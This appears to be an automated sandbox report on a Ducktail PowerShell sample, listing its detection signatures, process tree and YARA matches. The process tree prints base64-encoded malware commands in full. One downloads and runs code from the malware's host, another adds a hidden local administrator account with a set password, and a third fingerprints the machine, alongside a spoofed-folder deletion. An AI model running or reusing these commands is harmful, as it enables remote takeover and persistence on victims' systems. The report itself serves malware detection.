Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kingsmaker_4.ca.ps1

Overview

General Information

Sample name:kingsmaker_4.ca.ps1
Analysis ID:1565059
MD5:26b9748c7c6e3aeaed7a96eb26cb8277
SHA1:d3a67c19c99e205a552cbb875a7465591e938326
SHA256:85794de1be32ab105557d079db6f6b1b1b1f67bc37e887e9cdafa9d817dbb59e
Tags:kingsmaker-caps1user-JAMESWT_MHT
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Ducktail
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7112 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2636 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES421C.tmp" "c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 6776 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7500 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7720 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1720,i,11727097951679054640,6860338187584795454,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7368 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svchost.exe (PID: 7580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svczHost.exe (PID: 6584 cmdline: C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2108 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6600 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1276 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 6352 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2924 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7120JoeSecurity_Ducktail_12Yara detected DucktailJoe Security
    Process Memory Space: powershell.exe PID: 7120INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x18b2de:$b1: ::WriteAllBytes(
    • 0x18d716:$b2: ::FromBase64String(
    • 0x1ae662:$b2: ::FromBase64String(
    • 0x1aed9d:$b2: ::FromBase64String(
    • 0x1aefd6:$b2: ::FromBase64String(
    • 0x1af1ee:$b2: ::FromBase64String(
    • 0x1af2fb:$b2: ::FromBase64String(
    • 0x1af36b:$b2: ::FromBase64String(
    • 0x1af3c3:$b2: ::FromBase64String(
    • 0x1af427:$b2: ::FromBase64String(
    • 0x1af484:$b2: ::FromBase64String(
    • 0x1af50d:$b2: ::FromBase64String(
    • 0x1af582:$b2: ::FromBase64String(
    • 0x1af5f0:$b2: ::FromBase64String(
    • 0x1af651:$b2: ::FromBase64String(
    • 0x1af6ba:$b2: ::FromBase64String(
    • 0x1af71b:$b2: ::FromBase64String(
    • 0x1af7ac:$b2: ::FromBase64String(
    • 0x1af808:$b2: ::FromBase64String(
    • 0x1af86f:$b2: ::FromBase64String(
    • 0x1af8ce:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 7368JoeSecurity_Ducktail_12Yara detected DucktailJoe Security
      Process Memory Space: powershell.exe PID: 7368INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x11b470:$b1: ::WriteAllBytes(
